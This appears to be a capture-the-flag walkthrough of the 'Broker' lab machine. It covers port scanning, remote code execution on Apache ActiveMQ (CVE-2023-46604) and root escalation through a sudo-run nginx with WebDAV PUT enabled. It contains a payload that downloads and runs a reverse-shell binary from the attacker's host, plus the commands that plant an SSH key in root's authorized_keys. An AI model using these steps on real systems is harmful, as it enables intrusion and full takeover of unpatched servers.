Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.243 | TCP:22,80,1883,5672,8161,38507,61613,61614,61616 |
$ ip='10.10.11.243'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_ 256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
|_ ActiveMQ/Advisory/Consumer/Topic/#:
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
8161/tcp open http Jetty 9.4.39.v20210325
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
Apache MQ RCE
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图](https://img.4awl.net/img/37/5ca4887fb60af9d26a934d1179dc3f.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图")
$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean init-method="start">
<constructor-arg>
<list>
<value>sh</value>
<value>-c</value>
<!-- The command below downloads the file and saves it as test.elf -->
<value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
</list>
</constructor-arg>
</bean>
</beans>
$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图1](https://img.4awl.net/img/a2/c341063b8cb76ced0d5fb31cfd2c3a.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图1")
User.txt
a178c399b0c91839399aa5b98c0c117c
Privilege Escalation: Nginx ngx_http_dav_module
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图2](https://img.4awl.net/img/ba/2b6be6f30aa130ef4acb29a436c578.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图2")
$ cat << EOF> /tmp/shell.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events {
worker_connections 768;
}
http {
server {
listen 10031;
root /;
autoindex on;
dav_methods PUT;
}
}
EOF
$ sudo nginx -c /tmp/shell.conf
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图3](https://img.4awl.net/img/90/fc50dd963133af25a7fbf6a83ca5f8.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图3")
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图4](https://img.4awl.net/img/d8/74d7a5fdd6e19fd62b32583aaf0064.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图4")
$ ssh-keygen
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图5](https://img.4awl.net/img/00/c4056bba7a7b3d74780fe7a7736650.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图5")
$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys -d @/home/maptnh/.ssh/id_ed25519.pub
$ ssh root@10.10.11.243 -i /home/maptnh/.ssh/id_ed25519
![[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图6](https://img.4awl.net/img/b6/e904f026a97057949c434c8bb001d7.jpg "[Meachines] [Easy] Broker Apache MQ RCE+Nginx ngx_http_dav_module权限提升插图6")
Root.txt
26eecd6da62a87d2098e474929f93140
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
